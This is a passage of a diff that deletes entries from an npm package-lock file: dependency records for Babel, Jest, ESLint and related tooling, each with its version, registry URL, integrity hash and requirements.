"sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.24.1.tgz", - "integrity": "sha512-2ofRCjnnA9y+wk8b9IAREroeUP02KHp431N2mhKniy2yKIDKpbrHv9eXwm8cBeWQYcJmzv5qKCu65P47eCF7CQ==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.23.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.23.5.tgz", - "integrity": "sha512-85ttAOMLsr53VgXkTbkx8oA6YTfT4q7/HzXSLEYmjcSTJPMPQtvq1BD79Byep5xMUYbGRzEpDsjUf3dyp54IKw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.24.4.tgz", - "integrity": "sha512-FewdlZbSiwaVGlgT1DPANDuCHaDMiOo+D/IDYRFYjHOuv66xMSJ7fQwwODwRNAPkADIO/z1EoF/l2BCWlWABDw==", - "dev": true, - "requires": { - "@babel/template": "^7.24.0", - "@babel/traverse": "^7.24.1", - "@babel/types": "^7.24.0" - } - }, - "@babel/highlight": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.24.2.tgz", - "integrity": "sha512-Yac1ao4flkTxTteCDZLEvdxg2fZfz1v8M4QpaGypq/WPDqg3ijHYbDfs+LG5hvzSoqaSZ9/Z9lKSP3CjZjv+pA==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha1-p9BVi9icQveV3UIyj3QIMcpTvCU=", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.24.4", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.24.4.tgz", - "integrity": "sha512-zTvEBcghmeBma9QIGunWevvBAp4/Qu9Bdq+2k0Ot4fVMD6v3dsC9WOcRSKk7tRRyBM/53yKMJko9xOatGQAwSg==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.24.1.tgz", - "integrity": "sha512-2eCtxZXf+kbkMIsXS4poTvT4Yu5rXiRa+9xGVT56raghjmBTKMpFNc9R4IDiB4emao9eO22Ox7CxuJG7BgExqA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.24.0" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.24.1.tgz", - "integrity": "sha512-Yhnmvy5HZEnHUty6i++gcfH1/l68AHnItFHnaCv6hn9dNh0hQvvQJsxpi4BMBFN5DLeHBuucT/0DgzXif/OyRw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.24.0" - } - }, - "@babel/template": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.24.0.tgz", - "integrity": "sha512-Bkf2q8lMB0AFpX0NFEqSbx1OkTHf0f+0j82mkw+ZpzBnkk7e9Ql0891vlfgi+kHwOk8tQjiQHpqh4LaSa0fKEA==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.23.5", - "@babel/parser": "^7.24.0", - "@babel/types": "^7.24.0" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - } - } - }, - "@babel/traverse": { - "version": "7.24.1", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.24.1.tgz", - "integrity": "sha512-xuU6o9m68KeqZbQuDt2TcKSxUw/mrsvavlEqQ1leZ/B+C9tk6E4sRWy97WaXgvq5E+nU3cXMxv3WKOCanVMCmQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.24.1", - "@babel/generator": "^7.24.1", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.24.1", - "@babel/types": "^7.24.0", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - } - } - }, - "@babel/types": { - "version": "7.24.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.24.0.tgz", - "integrity": "sha512-+j7a5c253RfKh8iABBhywc8NSfP5LURe7Uh4qpsh6jc+aLJguvmIUBdjSdEMQv2bENrCR5MfRdjGo7vzS/ob7w==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.23.4", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@eslint/eslintrc": { - "version": "0.4.3", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-0.4.3.tgz", - "integrity": "sha512-J6KFFz5QCYUJq3pf0mjEcCJVERbzv71PUIDczuh9JkwGEzced6CO5ADLHB1rbf/+oPBtoPfMYNOpGDzCANlbXw==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^6.12.4", - "debug": "^4.1.1", - "espree": "^7.3.0", - "globals": "^13.9.0", - "ignore": "^4.0.6", - "import-fresh": "^3.2.1", - "js-yaml": "^3.13.1", - "minimatch": "^3.0.4", - "strip-json-comments": "^3.1.1" - } - }, - "@humanwhocodes/config-array": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.5.0.tgz", - "integrity": "sha512-FagtKFz74XrTl7y6HCzQpwDfXP0yhxe9lHLD1UZxjvZIcbyRz8zTFF/yYNfSfzU414eDwZ1SrO0Qvtyf+wFMQg==", - "dev": true, - "peer": true, - "requires": { - "@humanwhocodes/object-schema": "^1.2.0", - "debug": "^4.1.1", - "minimatch": "^3.0.4" - } - }, - "@humanwhocodes/object-schema": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.0.tgz", - "integrity": "sha512-wdppn25U8z/2yiaT6YGquE6X8sSv7hNMWSXYSSU1jGv/yd6XqjXgTDJ8KP4NgjTXfJ3GbRjeeb8RTV7a/VpM+w==", - "dev": true, - "peer": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.0.1.tgz", - "integrity": "sha512-n5M855fKb2SsfMIiFFoVrABHJC8QtHwVx+mHWP3QcEqBHYienj5dHSgjbxtC0WEZXYt4wcD6zrQElDPhFuZgfA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": 